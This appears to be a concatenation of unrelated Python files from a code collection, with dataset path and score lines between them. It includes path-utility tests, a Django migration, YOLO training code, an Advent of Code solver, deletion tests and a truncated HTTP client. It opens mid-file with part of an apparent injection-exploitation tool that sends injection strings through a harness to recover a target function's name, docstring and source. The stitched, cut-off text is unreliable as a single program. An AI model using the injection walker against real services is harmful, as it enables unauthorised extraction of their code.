self._src_code += f' """{self._docstring_walker.value}"""\n'
self._src_code += '\n'.join(indented_src_lines)
yield self
def _walk_name(
self
) -> Iterator[AbstractInjectionWalker]:
"""Recover the function's __name__ attribute."""
name_injection = f'{self._injection_str}.__qualname__!r'
result = self._harness.send_injection(name_injection)
if result is None:
yield FailedInjectionWalker.msg(
'Unable to read __name__ of function via injection '
f'{name_injection}')
return
walker = self.next_walker(name_injection, result)
if not isinstance(walker, NameInjectionWalker):
yield FailedInjectionWalker.msg(
f'Expected a name walker when sending {name_injection} '
f'but got {walker.__class__.__qualname__} instead')
return
yield from walker.walk()
self._name_walker = walker
def _walk_docstring(
self
) -> Iterator[AbstractInjectionWalker]:
"""Recover the function's __doc__ attribute."""
doc_string_injection = f'{self._injection_str}.__doc__!r'
result = self._harness.send_injection(doc_string_injection)
if result is None:
yield FailedInjectionWalker.msg(
'Unable to read __doc__ of function via injection '
f'{doc_string_injection}')
return
walker = self.next_walker(doc_string_injection, result)
if not isinstance(walker, DocStringInjectionWalker):
yield FailedInjectionWalker.msg(
f'Expected a doc walker when sending {doc_string_injection} '
f'but got {walker.__class__.__qualname__} instead')
return
yield from walker.walk()
self._docstring_walker = walker
@staticmethod
def code_obj_to_signature(
code_obj: CodeType
) -> str:
"""Get a function signature from a code object.
See:
https://stackoverflow.com/a/56761306/5094008
"""
try:
func = FunctionType(code_obj, {})
arg_sequence = inspect_signature(func)
return f'def {code_obj.co_name}{arg_sequence}:'
except TypeError:
# build our own signature
return f"""\
# exact argument names could not be reversed for below signature
def {code_obj.co_name}(*args, **kwargs):"""
def __str__(
self
) -> str:
return f'Injected function object with string {self._injection_str}'
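# A small illustration (hypothetical function, not taken from a real target) of
# what code_obj_to_signature() recovers from a bare code object:
#
#     >>> def greet(name): return 'hi ' + name
#     >>> FunctionInjectionWalker.code_obj_to_signature(greet.__code__)
#     'def greet(name):'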
| 2.75 | 3 |
tests/test_pathutils.py | pombredanne/https-github.com-nexB-tracecode-toolkit | 21 | 12796164 | #
# Copyright (c) nexB Inc. and others. All rights reserved.
# http://nexb.com and https://github.com/nexB/tracecode-toolkit/
# The TraceCode software is licensed under the Apache License version 2.0.
# Data generated with TraceCode require an acknowledgment.
# TraceCode is a trademark of nexB Inc.
#
# You may not use this software except in compliance with the License.
# You may obtain a copy of the License at: http://apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software distributed
# under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
# CONDITIONS OF ANY KIND, either express or implied. See the License for the
# specific language governing permissions and limitations under the License.
#
# When you publish or redistribute any data created with TraceCode or any TraceCode
# derivative work, you must accompany this data with the following acknowledgment:
#
# Generated with TraceCode and provided on an "AS IS" BASIS, WITHOUT WARRANTIES
# OR CONDITIONS OF ANY KIND, either express or implied. No content created from
# TraceCode should be considered or used as legal advice. Consult an Attorney
# for any legal advice.
# TraceCode is a free and open source software analysis tool from nexB Inc. and others.
# Visit https://github.com/nexB/tracecode-toolkit/ for support and download.
#
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import unittest
from tracecode import pathutils
class TestPathUtils(unittest.TestCase):
def test_common_path_prefix1(self):
test = pathutils.common_path_prefix('/a/b/c', '/a/b/c')
assert ('a/b/c', 3) == test
def test_common_path_prefix2(self):
test = pathutils.common_path_prefix('/a/b/c', '/a/b')
assert ('a/b', 2) == test
def test_common_path_prefix3(self):
test = pathutils.common_path_prefix('/a/b', '/a/b/c')
assert ('a/b', 2) == test
def test_common_path_prefix4(self):
test = pathutils.common_path_prefix('/a', '/a')
assert ('a', 1) == test
def test_common_path_prefix_path_root(self):
test = pathutils.common_path_prefix('/a/b/c', '/')
assert (None, 0) == test
def test_common_path_prefix_root_path(self):
test = pathutils.common_path_prefix('/', '/a/b/c')
assert (None, 0) == test
def test_common_path_prefix_root_root(self):
test = pathutils.common_path_prefix('/', '/')
assert (None, 0) == test
def test_common_path_prefix_path_elements_are_similar(self):
test = pathutils.common_path_prefix('/a/b/c', '/a/b/d')
assert ('a/b', 2) == test
def test_common_path_prefix_no_match(self):
test = pathutils.common_path_prefix('/abc/d', '/abe/f')
assert (None, 0) == test
    def test_common_path_prefix_ignore_trailing_slashes(self):
test = pathutils.common_path_prefix('/a/b/c/', '/a/b/c/')
assert ('a/b/c', 3) == test
def test_common_path_prefix8(self):
test = pathutils.common_path_prefix('/a/b/c/', '/a/b')
assert ('a/b', 2) == test
def test_common_path_prefix10(self):
test = pathutils.common_path_prefix('/a/b/c.txt',
'/a/b/b.txt')
assert ('a/b', 2) == test
def test_common_path_prefix11(self):
test = pathutils.common_path_prefix('/a/b/c.txt', '/a/b.txt')
assert ('a', 1) == test
def test_common_path_prefix12(self):
test = pathutils.common_path_prefix('/a/c/e/x.txt',
'/a/d/a.txt')
assert ('a', 1) == test
def test_common_path_prefix13(self):
test = pathutils.common_path_prefix('/a/c/e/x.txt', '/a/d/')
assert ('a', 1) == test
def test_common_path_prefix14(self):
test = pathutils.common_path_prefix('/a/c/e/', '/a/d/')
assert ('a', 1) == test
def test_common_path_prefix15(self):
test = pathutils.common_path_prefix('/a/c/e/', '/a/c/a.txt')
assert ('a/c', 2) == test
def test_common_path_prefix16(self):
test = pathutils.common_path_prefix('/a/c/e/', '/a/c/f/')
assert ('a/c', 2) == test
def test_common_path_prefix17(self):
test = pathutils.common_path_prefix('/a/a.txt', '/a/b.txt/')
assert ('a', 1) == test
def test_common_path_prefix18(self):
test = pathutils.common_path_prefix('/a/c/', '/a/')
assert ('a', 1) == test
def test_common_path_prefix19(self):
test = pathutils.common_path_prefix('/a/c.txt', '/a/')
assert ('a', 1) == test
def test_common_path_prefix20(self):
test = pathutils.common_path_prefix('/a/c/', '/a/d/')
assert ('a', 1) == test
def test_common_path_suffix(self):
test = pathutils.common_path_suffix('/a/b/c', '/a/b/c')
assert ('a/b/c', 3) == test
def test_common_path_suffix_absolute_relative(self):
test = pathutils.common_path_suffix('a/b/c', '/a/b/c')
assert ('a/b/c', 3) == test
def test_common_path_suffix_find_subpath(self):
test = pathutils.common_path_suffix('/z/b/c', '/a/b/c')
assert ('b/c', 2) == test
def test_common_path_suffix_handles_relative_path(self):
test = pathutils.common_path_suffix('a/b', 'a/b')
assert ('a/b', 2) == test
def test_common_path_suffix_handles_relative_subpath(self):
test = pathutils.common_path_suffix('zsds/adsds/a/b/b/c',
'a//a/d//b/c')
assert ('b/c', 2) == test
def test_common_path_suffix_ignore_and_strip_trailing_slash(self):
test = pathutils.common_path_suffix('zsds/adsds/a/b/b/c/',
'a//a/d//b/c/')
assert ('b/c', 2) == test
def test_common_path_suffix_return_None_if_no_common_suffix(self):
test = pathutils.common_path_suffix('/a/b/c', '/')
assert (None, 0) == test
def test_common_path_suffix_return_None_if_no_common_suffix2(self):
test = pathutils.common_path_suffix('/', '/a/b/c')
assert (None, 0) == test
def test_common_path_suffix_match_only_whole_segments(self):
# only segments are honored, commonality within segment is ignored
test = pathutils.common_path_suffix(
'this/is/aaaa/great/path', 'this/is/aaaaa/great/path')
assert ('great/path', 2) == test
def test_common_path_suffix_two_root(self):
test = pathutils.common_path_suffix('/', '/')
assert (None, 0) == test
def test_common_path_suffix_empty_root(self):
test = pathutils.common_path_suffix('', '/')
assert (None, 0) == test
def test_common_path_suffix_root_empty(self):
test = pathutils.common_path_suffix('/', '')
assert (None, 0) == test
def test_common_path_suffix_empty_empty(self):
test = pathutils.common_path_suffix('', '')
assert (None, 0) == test
| 1.375 | 1 |
django_learning/dim_sum/migrations/0002_dimsum_history.py | angelptli/django-learning | 0 | 12796165 | # Generated by Django 3.2.8 on 2021-10-24 01:32
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('dim_sum', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='dimsum',
name='history',
field=models.TextField(default='Write summary here.'),
),
]
| 1.671875 | 2 |
tests/unit/api/models/test_subscriptions.py | kikkomep/life_monitor | 5 | 12796166 |
# Copyright (c) 2020-2021 CRS4
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import logging
from lifemonitor.auth.models import Subscription, User
from tests import utils
logger = logging.getLogger()
def test_workflow_subscription(user1: dict, valid_workflow: str):
_, workflow = utils.pick_and_register_workflow(user1, valid_workflow)
user: User = user1['user']
s: Subscription = user.subscribe(workflow)
logger.debug("Subscription: %r", s)
assert s, "Subscription should not be empty"
assert len(user.subscriptions) == 1, "Unexpected number of subscriptions"
s: Subscription = user.unsubscribe(workflow)
logger.debug("Subscription: %r", s)
assert s, "Subscription should not be empty"
assert len(user.subscriptions) == 0, "Unexpected number of subscriptions"
| 2.046875 | 2 |
src/yolo4/BaseModel.py | xiao9616/yolo4_tensorflow2 | 212 | 12796167 | # =============================================
# -*- coding: utf-8 -*-
# @Time : 2020/5/14 10:50 AM
# @Author : xiao9616
# @Email : <EMAIL>
# @File : BaseModel.py
# @Software: PyCharm
# ============================================
import logging
import tensorflow as tf
import os
from src.yolo4.config import *
from src.yolo4.util import *
from src.yolo4.Net import YOLO4_NET
from src.yolo4.Loss import YOLO4_LOSS
logging.basicConfig(level=logging.DEBUG, format='%(asctime)s %(levelname)s %(message)s',
datefmt='%a, %d %b %Y %H:%M:%S', filename="./yolo4/logs/train.log", filemode='w+')
class BaseModel(object):
'''
    A custom base class; the methods below can be overridden:
'''
def data_generator(self):
'''
        Returns: this method can be overridden; it should return a tf.data dataset
'''
txt_data = tf.data.TextLineDataset(filenames=train_path)
count = 0
for _ in txt_data:
count += 1
train_data = txt_data.batch(batch_size=batch_size)
return train_data, count
def net_generator(self):
net = YOLO4_NET()
return net
def loss_generator(self):
loss = YOLO4_LOSS()
return loss
def optimizer_generator(self):
lr_schedule = tf.keras.optimizers.schedules.ExponentialDecay(
initial_learning_rate=0.001,
decay_steps=3000,
decay_rate=0.96,
staircase=True
)
optimizer = tf.keras.optimizers.Adam(learning_rate=lr_schedule)
return optimizer
def metric_generator(self):
metric = tf.keras.metrics.Mean()
return metric
def train(self):
        # GPU setup
tf.debugging.set_log_device_placement(True)
if use_gpu:
gpus = tf.config.experimental.list_physical_devices(device_type="GPU")
if gpus:
logging.info("use gpu device")
                # allow GPU memory to grow instead of pre-allocating it all
for gpu in gpus:
tf.config.experimental.set_memory_growth(device=gpu, enable=True)
tf.print(gpu)
else:
os.environ["CUDA_VISIBLE_DEVICE"] = "-1"
                logging.info("no GPU device found, falling back to CPU")
else:
logging.info("use cpu device")
            # disable the GPU
os.environ["CUDA_VISIBLE_DEVICE"] = "-1"
        # training data
train_dataset, train_count = self.data_generator()
        # network architecture
net = self.net_generator()
net.summary()
global fine_tune_epoch
        # whether to fine-tune from previously saved weights
if fine_tune:
net.load_weights(filepath=weights_path + "epoch-{}".format(fine_tune_epoch))
            print("loaded weights from epoch {}".format(fine_tune_epoch))
else:
fine_tune_epoch = -1
print("train model from init")
        # set up the loss function
loss = self.loss_generator()
        # set up the optimizer
optimizer = self.optimizer_generator()
        # set up the evaluation metric
metric = self.metric_generator()
        # model training and weight updates
for epoch in range(fine_tune_epoch + 1, train_epochs):
step = 0
for train_dataset_batch in train_dataset:
# print(train_dataset_batch)
step += 1
images, boxes = parse_dataset_batch(dataset=train_dataset_batch)
image_batch = process_image_batch(images)
label_batch = generate_label_batch(boxes)
with tf.GradientTape() as tape:
out = net(image_batch)
total_loss = loss(y_true=label_batch, y_pred=out)
gradients = tape.gradient(total_loss, net.trainable_variables)
optimizer.apply_gradients(grads_and_vars=zip(gradients, net.trainable_variables))
                metric.update_state(values=total_loss)
print("Epoch: {}/{}, step: {}/{} ,loss: {:.5f}".format(
epoch, train_epochs, step, tf.math.ceil(train_count / batch_size), metric.result()
))
metric.reset_states()
if epoch % save_frequency == 0:
net.save_weights(filepath=weights_path + "epoch-{}".format(epoch), save_format='tf')
net.save_weights(filepath=weights_path + "epoch-{}".format(train_epochs), save_format='tf')
if __name__ == '__main__':
yolo = BaseModel()
yolo.train()
| 2.34375 | 2 |
2019/20/day20.py | mfep/advent-of-code-2020 | 2 | 12796168 | import networkx as nx
import sys
from collections import defaultdict
sys.setrecursionlimit(100000000)
def direct_paths(lines):
world = nx.Graph()
for row,line in enumerate(lines):
for col,obj in enumerate(line):
if obj != '.':
continue
if line[col - 1] == '.':
world.add_edge((col, row), (col - 1, row))
if lines[row - 1][col] == '.':
world.add_edge((col, row), (col, row - 1))
return world
def search_portals(lines):
portals = defaultdict(list)
for row,line in enumerate(lines[:-1]):
for col,obj in enumerate(line):
if not obj.isalpha():
continue
if line[col + 1].isalpha():
portals[obj + line[col + 1]].append((col + 2, row) if line[col + 2] == '.' else (col - 1, row))
elif lines[row + 1][col].isalpha():
portals[obj + lines[row + 1][col]].append((col, row - 1) if lines[row - 1][col] == '.' else (col, row + 2))
return portals
def portal_paths(portal_list, world):
for portals in portal_list.values():
if len(portals) == 1:
continue
assert len(portals) == 2
world.add_edge(portals[0], portals[1])
with open('day20.txt') as f:
lines = f.readlines()
width = len(lines[0])
height = len(lines)
W = direct_paths(lines)
portal_connections = search_portals(lines)
portal_paths(portal_connections, W)
path = nx.dijkstra_path(W, portal_connections['AA'][0], portal_connections['ZZ'][0])
print('part one', len(path) - 1)
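# Part two (below) treats the maze as recursive: inner portals descend one level
# (dlevel +1 in the searches below), outer portals ascend one level (dlevel -1),
# and only reaching 'ZZ' while on level 0 counts as the exit.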
def is_outer(x, y):
return x == 2 or y == 2 or x == width - 4 or y == height - 3
def accessible_portals(pos, portal_list, world):
acc_outer, acc_inner = {}, {}
for portal_id in portal_list.keys():
if portal_id == 'AA':
continue
for portal_pos in portal_list[portal_id]:
if portal_pos == pos:
continue
try:
dst = nx.dijkstra_path_length(world, pos, portal_pos)
accessible = acc_outer if is_outer(*portal_pos) else acc_inner
assert portal_id not in accessible
accessible[portal_id] = dst, portal_pos
except nx.NetworkXNoPath:
pass
return acc_outer, acc_inner
def get_other_exit(portal_list, portal_id, current_pos):
return [pos for pos in portal_list[portal_id] if pos != current_pos][0]
def pathfind_recursive(pos, level, portal_list, world, history):
print(level)
def search_paths(accessible, dlevel):
paths = []
for pid, dst_pos in accessible.items():
if pid == 'ZZ' or (pid, dst_pos[1], level) in history:
continue
distance_to_goal = pathfind_recursive(get_other_exit(portal_list, pid, dst_pos[1]), level + dlevel, portal_list, world, history.union([(pid, dst_pos[1], level)]))
paths.append(distance_to_goal + dst_pos[0] + 1 if distance_to_goal else None)
paths = [path for path in paths if path]
return min(paths) if paths else None
acc_outer, acc_inner = accessible_portals(pos, portal_list, world)
if level == 0 and 'ZZ' in acc_outer:
return acc_outer['ZZ'][0]
if level != 0 and acc_outer:
outer_found = search_paths(acc_outer, -1)
if outer_found:
return outer_found
return search_paths(acc_inner, 1)
def pathfind_loop(world, portal_list, max_level):
def add_branches(accessible, new_level, current_length):
for pid in [pid for pid in accessible.keys() if pid != 'ZZ']:
current = accessible[pid]
new_length = current_length + 1 + current[0]
new_pos = get_other_exit(portal_list, pid, current[1])
to_check_branch.append((new_pos, new_level, new_length))
to_check_branch = [(portal_list['AA'][0], 0, 0)]
solutions = []
while to_check_branch:
pos, level, path_length = to_check_branch.pop()
acc_outer, acc_inner = accessible_portals(pos, portal_list, world)
if level == 0 and 'ZZ' in acc_outer:
solutions.append(path_length + acc_outer['ZZ'][0])
print(solutions[-1])
elif level >= max_level:
continue
add_branches(acc_inner, level + 1, path_length)
if level > 0 and acc_outer:
add_branches(acc_outer, level - 1, path_length)
return min(solutions) if solutions else None
W = direct_paths(lines)
#result = pathfind_recursive(portal_connections['AA'][0], 0, portal_connections, W, set())
result = pathfind_loop(W, portal_connections, 100)
print('part two', result)
| 2.828125 | 3 |
rp2paths/DotStyle.py | brsynth/RP2paths | 13 | 12796169 |
"""Class for setting the appearance of a dot file.
Copyright (C) 2016-2017 <NAME>, JL Faulon's research group, INRA
Use of this source code is governed by the MIT license that can be found in the
LICENSE.txt file.
"""
class NodeStyle(object):
"""General class for node style."""
def __init__(self, **kwargs):
"""Initialize."""
self.style = dict()
        for key, value in kwargs.items():
            self.style[key] = value
def GetStyle(self):
"""Return a dictionnary of key, value of .dot attributes."""
return self.style
class Chassis(NodeStyle):
"""Style for a chassis compound node."""
def __init__(self, **kwargs):
"""Initialize."""
super().__init__(**kwargs)
self.style.update({
'shape': 'rectangle',
'fontcolor': 'green',
'color': 'green',
'fontsize': '18',
'penwidth': '0'
})
class Intermediate(NodeStyle):
"""Style for an intermediate compound node."""
def __init__(self, **kwargs):
"""Initialize."""
super().__init__(**kwargs)
self.style = {
'shape': 'rectangle',
'fontsize': '18',
'penwidth': '0'
}
class Target(NodeStyle):
"""Style for a target compound node."""
def __init__(self, **kwargs):
"""Initialize."""
super().__init__(**kwargs)
self.style = {
'shape': 'rectangle',
'color': 'red',
'fontsize': '18',
'penwidth': '1'
}
class Reaction(NodeStyle):
"""Style for a reaction node."""
def __init__(self, **kwargs):
"""Initialize."""
super().__init__(**kwargs)
self.style = {
'shape': 'oval',
'fontsize': '24'
}
class EdgeStyle(object):
"""General class for edge style."""
def __init__(self, **kwargs):
"""Initialize."""
self.style = dict()
        for key, value in kwargs.items():
            self.style[key] = value
def GetStyle(self):
"""Return a dictionnary of key, value of .dot attributes."""
return self.style
class Consumption(EdgeStyle):
"""Style for a consumption edge."""
def __init__(self, **kwargs):
"""Initialize."""
super().__init__(**kwargs)
self.style = {
'color': 'green',
'penwidth': '2',
'arrowsize': '2'
}
class Production(EdgeStyle):
"""Style for a production edge."""
def __init__(self, **kwargs):
"""Initialize."""
super().__init__(**kwargs)
self.style = {
'color': 'red',
'penwidth': '2',
'arrowsize': '2'
}
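# A minimal usage sketch (the node name is an assumption, not from the project)
# of rendering one of the styles above as .dot attributes:
#
#     style = Target().GetStyle()
#     attrs = ', '.join('{}="{}"'.format(k, v) for k, v in style.items())
#     print('"TARGET" [{}];'.format(attrs))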
| 2.921875 | 3 |
mandala/tests/test_deletion.py | amakelov/mandala | 9 | 12796170 |
from .utils import *
from .funcs import *
from .conftest import setup_tests
def test_simple(setup_tests):
storage, cts = setup_tests
storage:Storage
############################################################################
### unit
############################################################################
### do some work
with run(storage=storage) as c:
x = add(23, 42)
c.commit()
### delete the work
with delete(storage=storage) as c:
x = add(23, 42)
c.commit_deletions()
### check if things got deleted
df = storage.rel_adapter.get_op_vrefs(op=add.op, rename=True)
assert df.empty
assert not storage.call_st.locs()
### do computation again
with run(storage=storage) as c:
x = add(23, 42)
c.commit()
with query(storage=storage) as c:
x, y = Any(), Any()
z = add(x, y)
df = c.qeval(x, y, z, names=['x', 'y', 'z'])
assert {tuple(elt) for elt
in df.itertuples(index=False)} == {(23, 42, 65)}
storage.drop_instance_data(answer=True)
############################################################################
### deleting multiple calls at once
############################################################################
with run(storage=storage) as c:
things = []
means = []
for i in range(10):
thing = inc(i)
things.append(thing)
for j in range(10):
things.append(add(thing, j))
cur_mean = mean(things)
means.append(cur_mean)
final = mean(means)
c.commit()
with delete(storage=storage) as c:
things = []
means = []
for i in range(10):
thing = inc(i)
things.append(thing)
for j in range(10):
things.append(add(thing, j))
cur_mean = mean(things)
means.append(cur_mean)
final = mean(means)
c.commit_deletions()
for func in (inc, add, mean):
df = storage.rel_adapter.get_op_vrefs(op=func.op, rename=True)
assert df.empty
assert not storage.call_st.locs()
storage.drop_instance_data(answer=True)
############################################################################
### deleting some things only
############################################################################
# run a workflow of several parts
with run(storage=storage) as c:
nums = range(10)
incs = [inc(x) for x in nums]
final = mean(x=incs)
c.commit()
# delete only latter part
with run(storage=storage) as c:
nums = range(10)
incs = [inc(x) for x in nums]
with c(mode=MODES.delete) as d:
final = mean(x=incs)
d.commit_deletions()
# check it got deleted but earlier things didn't
df = storage.rel_adapter.get_op_vrefs(op=mean.op, rename=True)
assert df.empty
df = storage.rel_adapter.get_op_vrefs(op=inc.op, rename=True)
assert df.shape[0] == 10
storage.call_st.locs()
storage.drop_instance_data(answer=True)
############################################################################
### deleting calls only, verifying vrefs remain orphaned
############################################################################
with run(storage) as c:
nums = range(10)
incs = [inc(x) for x in nums]
final = mean(x=incs)
c.commit()
inc_locs = [storage.where_is(vref=x) for x in incs]
assert not any(storage.rel_adapter.mis_orphan(locs=inc_locs))
final_loc = storage.where_is(vref=final)
assert not storage.rel_adapter.mis_orphan(locs=[final_loc])[0]
with delete(storage, autodelete=False) as c:
nums = range(10)
incs = [inc(x) for x in nums]
final = mean(x=incs)
c.commit_deletions()
assert all(storage.rel_adapter.mis_orphan(locs=inc_locs))
assert storage.rel_adapter.mis_orphan(locs=[final_loc])[0]
storage.drop_instance_data(answer=True)
############################################################################
### deleting with a superop
############################################################################
with run(storage, autocommit=True):
add_three(x=23, y=42, z=5)
with delete(storage, autodelete=True):
add_three(x=23, y=42, z=5)
assert not storage.call_st.locs()
storage.drop_instance_data(answer=True)
def test_superops():
storage = Storage()
@op(storage)
def get_divisors(num:int) -> TList[int]:
return [x for x in range(1, num) if num % x == 0]
@superop(storage)
def concat_divisors(nums:TList[int]) -> TList[int]:
divisors_list = [get_divisors(num) for num in nums]
return [elt for divs in divisors_list for elt in divs]
@op(storage)
def inc(x:int) -> int:
return x + 1
@superop(storage)
def inc_by_chunk(chunk:TList[int]) -> TList[int]:
return [inc(x) for x in chunk]
with run(storage, autocommit=True):
nums = list(range(20))
concat_divisors(nums=nums)
with delete(storage, autodelete=True):
nums = list(range(20))
concat_divisors(nums=nums)
assert len(storage.call_st.locs()) == 0
def test_bug():
storage = Storage()
@op(storage)
def get_divisors(num:int) -> TList[int]:
return [x for x in range(1, num) if num % x == 0]
@superop(storage)
def f(lst:TList[int]) -> int:
return lst[0]
with run(storage, autocommit=True):
lst = get_divisors(100)
f(lst)
with run(storage):
lst = get_divisors(100)
with delete(autodelete=True):
f(lst)
assert f.get_table().empty
storage.drop_instance_data(answer=True)
def test_drop_op():
"""
Tests for deleting operations are isolated to prevent schema changes across tests
"""
storage = Storage()
@op(storage)
def inc(x:int) -> int:
return x + 1
@op(storage)
def add(x:int, y:int) -> int:
return x + y
### drop empty op
storage.drop_func(f=add)
assert not storage.op_adapter.has_op(ui_name='add', version='0')
with run(storage, autocommit=True):
for i in range(10):
inc(i)
### drop op with results
storage.drop_func(f=inc)
assert not storage.op_adapter.has_op(ui_name='inc', version='0')
# cleanup
storage.drop_instance_data(answer=True)
def test_drop_uncommitted(setup_tests):
storage, cts = setup_tests
storage:Storage
### unit
with run(storage, autocommit=False):
for i in range(10):
inc(i)
assert len(storage.call_st.locs()) == 10
storage.drop_uncommitted_calls()
assert len(storage.call_st.locs()) == 0
storage.drop_instance_data(answer=True)
### after committed work
with run(storage, autocommit=False) as c:
for i in range(10):
inc(i)
c.commit()
with run(storage, autocommit=False) as c:
for i in range(10, 20):
inc(i)
assert len(storage.call_st.locs()) == 20
storage.drop_uncommitted_calls()
assert len(storage.call_st.locs()) == 10
storage.drop_instance_data(answer=True)
### test isolation of commits between partitions
with run(storage, autocommit=False, partition='first') as c:
for i in range(10):
inc(i)
c.commit()
with run(storage, autocommit=False, partition='second') as c:
for i in range(10, 20):
inc(i)
with run(storage, autocommit=False, partition='third') as c:
for i in range(20, 30):
inc(i)
c.commit()
assert len(storage.call_st.locs()) == 30
storage.drop_uncommitted_calls()
assert len(storage.call_st.locs()) == 20
storage.drop_instance_data(answer=True) | 2.171875 | 2 |
ist-study-table-roc.py | lhwangbo/m-ist | 0 | 12796171 | import time
import matplotlib.pyplot as plt
from joblib import dump, load
from sklearn.model_selection import *
# A custom-made library for reporting
from my_eval_functions import set_seeds, get_clf_eval, dingdong, printtimer
# Written by <NAME>, MD. Dec 2021.
##### BEGIN
print('Loading dataframe, base, and ensemble classifiers')
start_time = printtimer(time.time())
set_seeds(123)
# READS DF
df_final = load('df_final.joblib')
df = df_final[0]
df_label = df_final[1]
df_train, df_test, df_train_label, df_test_label = train_test_split (df, df_label, test_size=0.3, random_state=123)
# READS INDIVIDUAL BASE MODELS (Lv 0)
clflist = load('MortalityOutcomeModels.joblib')
clfnamelist = load('ClassifierNameList.joblib')
# READS STACKING ENSEMBLE MODEL (Lv 1)
ensemble_model = load('EnsembleModel.joblib')
### TO STDOUT
print('*****************************************************************************************')
print(' TRAINING SET\n')
print('=========================================================================================')
for i in range (0,len(clflist)):
print('\n***** INDIVIDUAL MODEL (best): ', clfnamelist[i])
get_clf_eval(df_train_label.tolist(), clflist[i].best_estimator_.predict_proba(df_train)[:, 1].tolist())
printtimer(start_time)
print('********** Ensemble [KNN + XGB + SVM + NB + RF + ANN + LR] ******************************')
print('*****************************************************************************************\n\n')
get_clf_eval(df_train_label.tolist(), ensemble_model.predict_proba(df_train)[:,1].tolist())
################# VALIDATION #################
print('*****************************************************************************************')
print(' VALIDATION SET\n')
print('=========================================================================================')
for i in range (0,len(clflist)):
print('\n***** INDIVIDUAL MODEL (best): ', clfnamelist[i])
get_clf_eval(df_test_label.tolist(), clflist[i].best_estimator_.predict_proba(df_test)[:, 1].tolist())
printtimer(start_time)
print('=========================================================================================')
print('********** Ensemble [KNN + XGB + SVM + NB + RF + ANN + LR] ******************************')
print('*****************************************************************************************\n\n')
get_clf_eval(df_test_label.tolist(), ensemble_model.predict_proba(df_test)[:,1].tolist())
printtimer(start_time)
dingdong()
| 2.65625 | 3 |
src/utils.py | qbasista/api-scraper | 0 | 12796172 | <filename>src/utils.py
from typing import Dict
def add_prefix_to_keys(data: Dict, prefix: str) -> Dict:
keys = [*data.keys()]
for key in keys:
data[f"{prefix}_{key}"] = data.pop(key)
return data
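# Illustrative usage (assumed, not part of the scraper itself):
if __name__ == "__main__":
    sample = {"name": "pen", "price": 2}
    # prints {'item_name': 'pen', 'item_price': 2}
    print(add_prefix_to_keys(sample, "item"))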
| 2.765625 | 3 |
unit_tests/LLC1/test_create_llc1.py | LandRegistry/maintain-frontend | 1 | 12796173 | <filename>unit_tests/LLC1/test_create_llc1.py<gh_stars>1-10
from flask_testing import TestCase
from unit_tests.utilities import Utilities
from maintain_frontend import main
from maintain_frontend.dependencies.session_api.session import Session
from maintain_frontend.constants.permissions import Permissions
from flask import url_for
class TestCreateLLC1(TestCase):
def create_app(self):
main.app.testing = True
Utilities.mock_session_cookie_flask_test(self)
return main.app
def test_create_llc1(self):
self.client.set_cookie('localhost', Session.session_cookie_name, 'cookie_value')
self.mock_session.return_value.user.permissions = [Permissions.request_llc1]
response = self.client.get(url_for("create_llc1.create_llc1"))
self.assert_status(response, 302)
self.assertRedirects(response, url_for("create_llc1.llc1_get_location"))
self.mock_session.return_value.commit.assert_called()
| 2.390625 | 2 |
ex022.py | LucasIdalino/Exerc-cios-do-Curso | 0 | 12796174 | <gh_stars>0
# Variable value with no spaces at the beginning or end.
nome = str(input("Seu nome: ")).strip()
# Variable value in uppercase letters.
print("Maiúscula:", nome.upper(), "\033[1;32m<--\033[m")
# Variable value in lowercase letters.
print("Minúscula:", nome.lower(), "\033[1;32m<--\033[m")
# Counting how many letters the value of the name variable has, excluding spaces.
print("Meu nome tem:", len(nome)-nome.count(" "), "\033[1;32m<--\033[m")
# print("Meu primeiro nome tem:", nome.find(" "))
# print("Seu primeiro tem {} letras".format(nome.find(" ")))
separa = nome.split()
print("Meu primeiro nome tem:", len(separa[0]), "\033[1;32m<--\033[m")
| 3.9375 | 4 |
client.py | bollacker/lri-b | 0 | 12796175 | <filename>client.py
#!/usr/bin/env python
# Copyright 2012-2013 inBloom, Inc. and its affiliates.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json,sys,httplib2,urllib,yaml,traceback,copy,base64,zlib
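# Cursors handed back by the server are urlsafe-base64-encoded, zlib-compressed
# JSON blobs; parse_cursor below reverses that encoding for inspection.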
def parse_cursor(s):
return(json.loads(zlib.decompress(base64.urlsafe_b64decode(s.encode('utf-8')))))
class client(object):
def __init__(self,host='127.0.0.0',port=8000,verbose=False):
self.headers={}
self.host=host
self.port=port
self.verbose=verbose
self.errors = []
self.connect()
def connect(self):
try:
self.conn=httplib2.Http()
except:
self.errors.append("Failed to connect to server at host %s port %s." % (self.host,self.port))
if self.verbose:
print self.errors[-1]
#def query(self,httpmode,command,q,opts,parse=True):
def query(self, *args, **kwargs):
if not kwargs:
parse = True
else:
parse = kwargs['parse']
if len(args) == 4:
httpmode, command, q, opts = args[0:4]
elif len(args) == 3:
httpmode, command, q, opts = 'GET', args[0], args[1], args[2]
uq=urllib.urlencode({"q":json.dumps(q)})
uopts=urllib.urlencode({"opts":json.dumps(opts)})
